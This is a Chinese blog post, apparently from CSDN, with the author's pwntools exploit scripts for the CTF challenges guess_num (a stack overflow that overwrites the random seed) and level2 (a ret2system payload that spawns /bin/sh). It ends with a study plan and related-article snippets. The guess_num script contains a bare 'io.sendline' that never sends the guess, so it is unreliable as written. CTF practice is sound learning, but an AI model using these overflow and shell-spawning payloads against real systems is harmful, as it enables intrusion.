2019.7.14 guess—num and level2

最新推荐文章于 2023-10-30 19:01:30 发布
原创 最新推荐文章于 2023-10-30 19:01:30 发布 · 798 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

博客介绍了使用`cdll.LoadLibrary`加载动态链接库及用`ldd`查询文件所需动态链接库路径。还阐述了Pwn题核心思想,即通过栈溢出覆盖原函数返回地址,创造伪栈帧,且主调函数基地址和返回地址字节数依程序位数而定。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

A
1.guess_num的脚本如下:

# -*- coding: utf-8 -*-
from pwn import *
from ctypes import *  #下面要用到c语言的函数。所以导入ctypes模块的全部方法
io=remote('111.198.29.45',49952)
b = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")   
payload = 'A'* (0x20) + p64(1)  #将1覆盖随机数种子,该种子是两个字节
io.recvline()
io.sendline(payload)
b.srand(1) #取该种子为1
for i in range(10):
    num = str(b.rand()%6+1) 
    io.recvline()
    io.sendline
io.interactive()

b = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6") 用ldd 文件名来查询这个文件需要链接的动态链接库及其路径。

  kk@ubuntu:~/Desktop/black/GFSJ/guess_num$ ldd guess_num 
    linux-vdso.so.1 =>  (0x00007ffd3f5a0000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1e6c0b0000)
    /lib64/ld-linux-x86-64.so.2 (0x00007f1e6c67d000)
    
    主要思想就是利用溢出将覆盖随机数种子,因为只要随机数种子一样,产生的一系列随机数都是一样的。
    2.level2的脚本如下:
 # -*- coding:utf-8 -*-
from pwn import *
p = remote('111.198.19.45',59444)
elf=ELF('./level2') #以ELF文件读取文件
sys_addr=elf.symbols['system']#搜索函数用的是[ ]
sh_addr=elf.search('/bin/sh').next()#搜索字符串用的是()
payload='A'*(0x88+0x4)+p32(sys_addr)+p32(0xdeadbeef)+p32(sh_addr)#注意16进制计算
p.recvline()
p.sendline(payload)
p.interactive()

这个题的核心思想是通过栈溢出将原函数的返回地址覆盖成自己想要执行的函数,即创造一个伪栈帧(需要参数,返回地址,主调函数的基地址,局部变量)。上面描述的都要压在栈里面。主调函数的基地址和返回地址所占的字节都要根据程序是多少位写的来判断(32位的4字节,即一个寄存器。64位的,8字节)。
B
1.明天的任务:看3集32位小甲鱼的汇编,3集c语言,2两个pwn题目(弄懂),pe文件结构两集。看30页x86的汇编书。

数据中台在环保行业的应用:环境监测分析
AI天才研究院
04-23 936
随着全球环境问题日益严峻,环保行业面临着海量环境监测数据的处理和分析挑战。传统的数据管理方式已无法满足现代环境监测的需求。本文旨在探讨如何通过构建数据中台来解决环保行业在环境监测分析中的数据整合、处理和应用问题,提高环境监测的效率和准确性。本文范围涵盖数据中台在环保行业环境监测领域的架构设计、技术实现、数学模型和实际应用案例,重点关注大气、水质、噪声等环境要素的监测分析。本文首先介绍数据中台在环保行业的背景和意义,然后详细阐述数据中台的核心架构和关键技术。
国产化操作系统改造实践
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
04-10 7923
而这些广泛使用的系统都是美国控制范围之内,停服之后,我国将面临产品中断、安全漏洞、运维困难、生态缺失等问题。为降低非自主可控OS对网络安全及供应链的影响,国家及中移集团要求各单位要积极推进CentOS、RedHat及其衍生版本以及SUSE操作系统迁移,提前准备其他品牌非国产操作系统的迁移;目标系统采用基于国内开源社区欧拉社区和龙蜥社区发布的版本。1)上传商业版BCLinux 8.6或社区版Anolis 8.6 镜像到目标主机。2)部署配置FTP服务。
CTF|栈溢出guess num 练习及知识点总结
skyattractive的博客
05-31 1288
CTF|栈溢出题目guess_num 练习及知识点总结 博客主要记录博主做的一栈溢出题目和所涉及到的知识点的总结 . 题目 将得到的文件拖入64位IDA中F5反编译得到伪代码 观察伪代码 得到如下信息: 定义char型 v9 让你输入内容,用gets()函数获取你输入的值,但是没有做限制 将v6 = v8就success! 实现success!之后可以进入sub-C3E函数,即可得到flag! 其中代码涉及到两个特殊的函数 关于两个函数的知识点如下: rand()函数用来产生随机数,但是,ran.
guess_num
4HftysN
08-02 823
主函数代码 这道题的思路是通过v8的输入 覆盖seed的值 进入v8可以看到与seed相差0x20 此处就可构造payload=‘a’*0x20+p64(1) -------------------------------------------------设置种子数为1 通过控制种子数seed来控制随机数rand 以取得flag 在调用rand()函数时,必须先利用srand...
初学pwn-攻防世界(guess_num)
天柱的博客
08-28 1461
初学pwn-writeUp 攻防世界的第六题,guess_num。 从这个题目可以猜出来,是跟猜数字有关的题目。启动靶机。 使用nc链接远端,查看一下。 发现链接之后,首先是输出了欢迎界面,之后需要输入一个名字。输入完成之后就要求开始猜数字。但是要命的是,只能猜一次,猜错了就GG。没有办法,这条路行不通。 下载文件,cat一下,很明显,是一个ELF文件。放进ida里查看一下。 发现这里的逻辑,就是生成一个伪随机数,然后进行猜数字。可以看到在23行这里,给srand函数设置了一个种子,然后进入循环,生成随
guess_num(xctf)
weixin_43868725的博客
05-06 487
0x0 程序保护和流程 保护: 流程: main() sub_C3E() 如果程序能成功运行到最后就能获得flag 0x1 利用过程 由于程序保护的比较全面,因此不能通过gets()进行栈溢出,所以只能通过模仿程序流程来解决问题。查阅资料得知srand(seed)会根据seed的数值改变rand()函数产生的随机数,也就是说相同种子生成的随机数是相同的。刚好gets()函数可以修改seed[...
[攻防世界]guess_num
逆向萌新的博客
06-01 820
目录步骤:查保护:NX保护:PIE保护:Stack保护:RELRO保护:寻找逻辑:脚本:checksec 文件名NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局
DDCTF2019-Writeup
40KO的博客
04-19 5331
目录 WindowsReverse1 WindowsReverse2 confused obfuscating macros 黑盒破解2 北京地铁 MulTzor [PWN] strike Wireshark 联盟决策大会 滴~ Web签到题 Upload-IMG 大吉大利,今晚吃鸡~ Breaking LEM WindowsReverse1 比较基础的一...
C Primier Plus(第六版)第8章 编程练习 VS2019测试
ptbls的博客
11-29 253
第1题 /*编程练习8.1 设计一个程序,统计在读到文件结尾之前读取的字符数*/ #include<stdio.h> #include<stdlib.h> //使用exit() int main(void) { char ch; FILE* fp; errno_t err; //如果成功,返回值为零;如果失败,则为错误代码。 long n = 0; if ((err = fopen_s(&fp,"D:\\Project\\practice8_1\\Shakesp
ffmpeg 4.2.1 版本升级日志 APIChanges
guniwi的博客
03-26 2798
ffmpeg的版本升级日志,可以查询各个版本的API变更情况,可以比对avcodec_version()返回结果确定版本等。该日志在ffmpeg源码的doc目录下。有的小伙伴可能没有源码,故在此发一份。 Never assume the API of libav* to be stable unless at least 1 month has passed since the last ma...
guess_num.py
08-11
自己用python 写了个非常简单的入门小游戏,猜数字,可以修改源码,加大难度,挺好玩的 玩法如下: 1、系统随机给出一个1-20的数字 2、玩家来猜,共5次机会,猜对后提示: !!Great,you guess the num! 用完5次机会还没猜对,提示: Your retry times>5,Game over! 3、期间会有提示 猜的数字是偏大,还是偏小
guess_num--writeup(含python和C++混合编程)
ATFWUS的博客
03-01 687
文件下载地址: 链接:https://pan.baidu.com/s/13uowRQszM6GRvKMEYGG16g 提取码:le64 目录 0x01.分析 0x02.重点 0x01.分析 checksec: 64位程序,这,好像不太友好,全部保护措施全部开启,暂时无法直接使用栈溢出。 查看源码: 流程大概是,先要输入名字,然后开始猜数,有一次猜错就退出程序,必须每...
攻防世界 guess_num
09-27 1159
1.题目 2.Ida反汇编 3.根据上图代码,分析基本流程。 流程:随机种子生成随机数,对比随机数和输入的数字,连续正确10次就成功。 初看好像不可能成功,怎么可能猜对随机数十次?其实srand生成的随机数是伪随机数。其实就是一个很长的数字字符串,然后根据种子定位到这个字符串某个点,然后每次生成随机数就读一个数字字符。也就是说,如果我们的种子是一样的,相同的随机次序我们得到的随机数是一样的。 于是,现在的问题变成了我们怎么得到程序的种子?或者我们是否可以修改程序的种子? 查看c源码.
[攻防世界 pwn]——guess_num
Y_peak的博客
02-19 1464
[攻防世界 pwn]——guess_num15 [攻防世界 pwn]——level0 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX, canary, PIE 好家伙 在IDA中发现 我们只要利用gets函数将seed[0]给覆盖掉就可以了, 间距为0x20 用C语言写个小demo #include <stdio.h> #include <stdlib.h> int main() { int n, b;
攻防世界-guess_num
qq_45771413的博客
04-23 584
查看保护 好家伙,不留活口(;´д`)ゞ IDA 逻辑很简单,输入名字后,程序会生成一个随机数种子,然后循环10次以下操作: 输入一个数,这个数和本次随机循环数值除以6的余数+1是否相等,相等则跳转到函数 sub_C3E() ,这里面直接有 system(“cat flag”); 分析 10次随机数必不能每次都对,所以得想办法绕过随机数或者修改随机数种子,让其种子固定则其生成的随机数也固定。 本体最有可能栈溢出的地方就是gets,gets获取输入存到v7,进入v7看看有没有漏洞: 可以看到v7下面就是s
攻防世界guess_num
weixin_52296042的博客
10-29 215
我们分析程序如果v4 = v6 连续十次则循环结束,然后执行后面函数获得flag 如果数字不等则退出 我们观察栈空间发现var-30(v7)与seed相差0x20。 然后我们可以利用gets函数的天然漏洞,覆盖seed为3, 下面是脚本。我们可以利用ldd file查看libc。这里利用ctypes库实现python、c混合编程 脚本中的cat_flag函数地址是多余的 新人博客,如果错误。请大佬指正 ...
xctf--新手区--guess_num
gclome的博客
04-20 918
writeup 老规矩,先checksec下,查看保护机制 64位程序,保护机制全开啊,不过不慌,先运行一下大致看看 两次输入分别是Your name和 guess number ,其余皆是程序输出,貌似没有得到什么有用的东西。 再次借助强大的IDA查看源码: 分析源码得知,我们要输入十次随机数产生的值,如果一次错,那就GG,十次全部输入正确,就success!,flag应该就藏在succes...
攻防世界pwnguess_num
最新发布
SUOYE_GUANXING的博客
10-30 284
flag为:cyberpeace{08b9d2e122fdcc5cfd4c7955eb732ae1}看这里,一开始还以为是我输入一个数,可以看到它会回显的数字;0x30-0x10;需要0x20个字符来让它溢出;使用ida64打开;进入gets漏洞点看;
攻防世界 pwn 练习区 guess_num
ChaoYue_miku的博客
07-12 768
题目描述:菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 ** 0、下载附件,使用checksec查看保护情况和文件位数,尝试打开文件 ** 64位可执行文件,开启了canary,NX,PIE和部分RELRO保护 ** 1、使用IDA64 Pro打开文件 ** 查看main函数,是一个猜数游戏,通过srand()函数初始化rand()函数的初始值,seed[0]作为种子,然后进行10轮猜数,全部正确之后,执行sub_C3E()函数。 查看sub_C3E()函数: 执行后直接得到flag
基于Vivado 2019.2实现Verilog数字时钟及秒表功能
资源摘要信息:"在本资源中,我们将重点介绍如何在vivado2019.2版本中使用纯verilog语言开发一个具备记时和秒表功能的数字时钟设计。数字时钟设计是在FPGA硬件上实现的,它是一个广泛应用于电子设计自动化领域中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值